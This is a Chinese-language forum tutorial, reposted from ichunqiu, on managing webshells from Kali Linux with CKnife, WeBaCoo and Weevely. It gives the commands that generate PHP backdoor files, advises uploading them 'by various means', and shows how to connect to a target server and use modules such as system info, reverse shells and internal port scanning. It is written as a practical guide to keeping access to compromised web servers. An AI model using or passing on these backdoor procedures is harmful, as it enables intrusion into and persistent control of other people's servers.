如何在Linux下管理webshell
0x01 前言
Kali Linux作为一款专为渗透测试而生的Linux操作系统,在安全界的影响广泛。一般的webshell在Windows下面经常使用Chopper(中国菜刀)来管理,那么在Linux下面,有没有类似的工具来达到类似的效果呢?答案是肯定的。下面以Kali为平台介绍3种常见的webshell工具。
0x02 跨平台版菜刀-CKnife
这款被业界成为C刀的工具是由Chora && MelodyZX两位作者联合开发的,目的是成为一个Java版跨平台“菜刀”。整体功能大致与菜刀类似(因为就是模仿菜刀来写的呀!)笔者认为,在Kali上使用还是可以的,毕竟Chopper不能。有人总要问,哪个更好一点?从我的角度看,菜刀毕竟原创,很多方面都很强大,如果是Windows,强烈建议找一款去后门的菜刀来用。当然,Kali下面,C刀还是能应急的。看看效果吧:


相关链接:
Github:https://github.com/Chora10/Cknife
下载: http://pan.baidu.com/s/1nul1mpr 密码:f65g
0x03 一款小巧的PHP后门工具:WeBaCoo
WeBaCoo-全名:Web Backdoor Cookie
- 简介:Kali已经集成,产生类终端shell,编码通信内容通过HTTP头传输,隐蔽性较强。
- 优缺点:方便简单。适合作为临时shell,没有密码,只能用于php!
- 使用方法:
- 生成服务端程序
[Bash shell] 纯文本查看 复制代码1
webacoo -g -o a.php
- 通过各种手段上传
- 客户端连接
[Bash shell] 纯文本查看 复制代码1
webacoo -t -u http:
//1
.1.1.1
/a
.php
eg>通过Kali+Metaspolitable完成功能演示:



0x04 另一款强大的PHP后门-Weevely
Weevely-具有隐蔽性的类终端PHP Webshell
30多个强大的管理模块
1、可用于执行系统命令、浏览文件系统
2、检查服务器常见配置错误
3、创建正向、反向TCP Shell链接
4、通过目标主机代理HTTP流量
5、从目标主机运行端口扫描,渗透内网
6、支持设置密码
[AppleScript] 纯文本查看 复制代码
1
2
3
|
#一个小插曲:Kali自带Weevely缺少PySockets库而不能正常运行 安装即可:https : / / pypi.python.org / pypi / PySocks / . / setup.py install |
功能演示:
1、生成服务端程序
[Bash shell] 纯文本查看 复制代码
1
2
|
~ # weevely generate <password> b.php ~ # cat /usr/share/weevely/b.php |

2、各种上传

3、客户端连接
[Bash shell] 纯文本查看 复制代码
1
|
~ # weevely http://1.1.1.1/b.php <password> |

4、模块的使用:
[Bash shell] 纯文本查看 复制代码
1
2
|
$ help $ [模块名] |
例如,使用:system_info导出系统信息

0x05 总结
前面三种工具是笔者经常于Linux使用的工具,CKnife是图形化界面的,类似与菜刀,用法也相似。而后面两种是属于命令行式的,各有优势。当然Linux下的webshell管理还有其他的方式。比如利用MSF下的Payload: PHP Meterpreter……
对于以上三种,推荐使用weevely,毕竟有强大的功能。
对于以上三种,推荐使用weevely,毕竟有强大的功能。
转自:https://bbs.ichunqiu.com/thread-26447-1-1.html